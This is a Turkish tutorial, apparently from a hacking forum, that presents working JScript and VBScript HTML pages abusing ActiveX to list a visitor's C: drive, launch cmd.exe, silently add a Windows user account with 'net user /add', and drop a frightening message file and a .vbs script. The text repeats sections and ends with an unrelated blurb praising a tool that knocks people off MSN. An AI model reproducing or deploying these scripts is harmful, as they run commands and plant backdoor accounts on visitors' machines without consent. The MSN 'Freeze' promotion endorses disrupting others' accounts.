Bu Günkü Konumuz Scriptler, Genel Anlamda Sisteminizi Sizin İzniniz İle Elegeçirmek İçin Kullanılan Aslen İyi Fakat Kullan Tarafindan Kötüye Kullanılan Kodları İncelyeceğiz. İlk Olarak Jsript İle Sonra Vbscript Ve Son Olarak Hta Ve Java Applet Uygumaları İle Gerek Asp Gerek Html Gerekse Php Dilleri İle İstemciye Yönelik Atack Ve Savunmaya Göz Atacağız. Şimdi İlk Olarak Jscript Kullanarak İstemci Yönelimli Bir FSO Yazıyorum...
Metin Editörünü Açıyoruz ve başlıyoruz.
Öncelikle En Önemli Olan Şey Dosyalarımızdan Başlıyoruz...
İstemcinin Dosyalarina Bakalım Nelermiş
Şimdi İse Kullanici Üzerinde Bir Program Çalıştıralim..
Bunu Ise VbScript İle Yapalim.
Şimdi Biraz Daha İleri Giderek Komut Yolayalim ve Birşeyler Yaptiralim
/c parametresi cmd.exe den sonra komut işlemek icin kullanilir ben en basit olarak sisteme bir kullanici eklemek istiyorum ve kolaylik olsun yada Administrator sifresini değiştirelim seçim sizin
Şimdi Birazcik Daha İlerlemek İstiyor Canim Gerçi Yapılacak Çok Şey Var Ama Neyse Son Bir Örnek Daha Yapalım.
Dilerseniz Mesaj Olarak Farklı Yollada Mesaj Verebilirsiniz Biraz Daha Geliştirerek
ama şimdilik bu ders icin bukadari yeterli iyi çalışmalar kolay gelsin korunmaya yolları ve diğer ayrintilar diğer derslerde. unutmadan net user /add komutunu anlatayım. net user add komutu sisteme kullanici ekler geniş bilgi için
başlat > caliştir > cmd yazıp buraya net user /? yazıp daha ayrıntılı bilgiye sahip olabilirsiniz diğer komutlarıda öğrenirsiniz hadi kolay gelsin iyi çalışmalar.
Metin Editörünü Açıyoruz ve başlıyoruz.
Öncelikle En Önemli Olan Şey Dosyalarımızdan Başlıyoruz...
İstemcinin Dosyalarina Bakalım Nelermiş
<html>
<title> title>
<script language="JavaScript">
// burada kucuk buyuk harf duyarliligina dikkat edin js ciler bilir ama ben yinede uyarayım :) :;)
var yolum = 'c:\\';
//simdi ise fso nesnesini tanımlayalim
var fso = new ActiveXObject('Scripting.FileSystemObject');
//simdi Dosyalara bakalım :)
var klsr = fso.Getfolder(yolum);
//simdi dosyalara bakalim varmi yokmu varsa sayalim, yoksa islemi bitirelim :)
for (dosyalari = new Enumerator(klsr.files); !dosyalari.atEnd();
dosyalari.moveNext())
{
var dosyalar = dosyalari.item();
document.write(dosyalar.name, "
" );
}
Şimdi İse Kullanici Üzerinde Bir Program Çalıştıralim..
Bunu Ise VbScript İle Yapalim.
<html>
<title> title>
<script language="VBScript">
' Hata Durumunda Devam Etmesini Belirtiyorum
On Error Resume Next
' Çalıştırılacak Olan Exenin Yolunu Belirtiyorum. Burada %SystemRoot% Kulu Olan Windows Yoludur. Ayni %UserProfile% gibi ;)
ExeYolu= "%SystemRoot%\system32\cmd.exe"
'Programi Caliştiracak Olan Nesnemi Oluşturuluyorum
Set pcalisitir = Createobject("Wscript.Shell")
' Ve Çalıştırma Komutunu Veriyorum
pcalisitir.run ExeYolu
' scripti kapatiyorum :)
Şimdi Biraz Daha İleri Giderek Komut Yolayalim ve Birşeyler Yaptiralim
/c parametresi cmd.exe den sonra komut işlemek icin kullanilir ben en basit olarak sisteme bir kullanici eklemek istiyorum ve kolaylik olsun yada Administrator sifresini değiştirelim seçim sizin
<html>
<title> title>
<script language="VBScript">
' Hata Durumunda Devam Etmesini Belirtiyorum
On Error Resume Next
' Burada %SystemRoot% Kurulu Olan windows yolu olduğunu yukarda belirttim /c parametresinden sorna geleninde komut olduğunu biliyorsunuz.bi bilmediğiniz net user /add kodyaziyorumcom ? onuda aşağida acikliyacam.
ExeYolKomut = "%SystemRoot%\system32\cmd.exe /c net user /add kodyaziyorumcom"
'Programi Caliştiracak Olan Nesnemi Oluşturuluyorum
Set pcalisitir = Createobject("Wscript.Shell")
' Ve Çalıştırma Komutunu Veriyorum
pcalisitir.run ExeYolKomut' scripti kapatiyorum :)
<html>
<title> title>
<script language="VBScript">
' Hata Durumunda Devam Etmesini Belirtiyorum
On Error Resume Next
' Mesajımızı Yazdiralim :)
ExeYolu = "%SystemRoot%\system32\cmd.exe /c echo Sisteminizde Ciddi Bir Açık Var. Önemsediğiniz Dosyalariniz Veya Hesap Şifreleriniz Varsa, En Yakın Sistem Uzamanına Gitmenizi Oneririm ;) > c:\MESAJINVAR.TXT"
' Metin Editörümüzün yolunu tanımlayalim
Ac = "%SystemRoot%\system32\notepad.exe"
'Programi Caliştiracak Olan Nesnemi Oluşturuluyorum
Set pcalisitir = Createobject("Wscript.Shell")
' Ve Çalıştırma Komutunu Veriyorum mesajımızı yazdiriyoruz.
pcalisitir.run ExeYolu
' Metin Editörümüz ile mesajımızı acalim :)
pcalisitir.run ac + " c:\MESAJINVAR.TXT"
<html>
<title> title>
<script language="VBScript">
' Hata Durumunda Devam Etmesini Belirtiyorum
On Error Resume Next
' denden işaretini tanımlayalim
denden = chr(34)
' Mesajımızı Yazdiralim :)
ExeYolMesaj = "%SystemRoot%\system32\cmd.exe /c echo MsgBox(" & denden & "Sisteminizde Ciddi Bir Acik Var. Onemsediğiniz Dosyalariniz Veya Hesap Sifreleriniz Varsa, En Yakın Sistem Uzamanına Gitmenizi Öneririm" & denden & ") > c:\mesaj.vbs"
'Programi Caliştiracak Olan Nesnemi Oluşturuluyorum
Set pcalisitir = Createobject("Wscript.Shell")
' Ve Çalıştırma Komutunu Veriyorum mesajımızı yazdırıyoruz.
pcalisitir.run ExeYolMesaj
' Scripti Çalıştıralim
pcalisitir.run "c:\mesaj.vbs"
ama şimdilik bu ders icin bukadari yeterli iyi çalışmalar kolay gelsin korunmaya yolları ve diğer ayrintilar diğer derslerde. unutmadan net user /add komutunu anlatayım. net user add komutu sisteme kullanici ekler geniş bilgi için
başlat > caliştir > cmd yazıp buraya net user /? yazıp daha ayrıntılı bilgiye sahip olabilirsiniz diğer komutlarıda öğrenirsiniz hadi kolay gelsin iyi çalışmalar.
bir ustanın bilgisayarında birşey kaybolmaz sadece yer değiştirir 
Neyse Programı açıyoruz
anlayacağınız on numara bir program kolay gelsin zaten kullanımı çok basit Freeze yazan yere tıklıyorsunuz 2 3 dk sonra msn den düşüyor ve siz DeFreeze diyene kadar giremiyor 
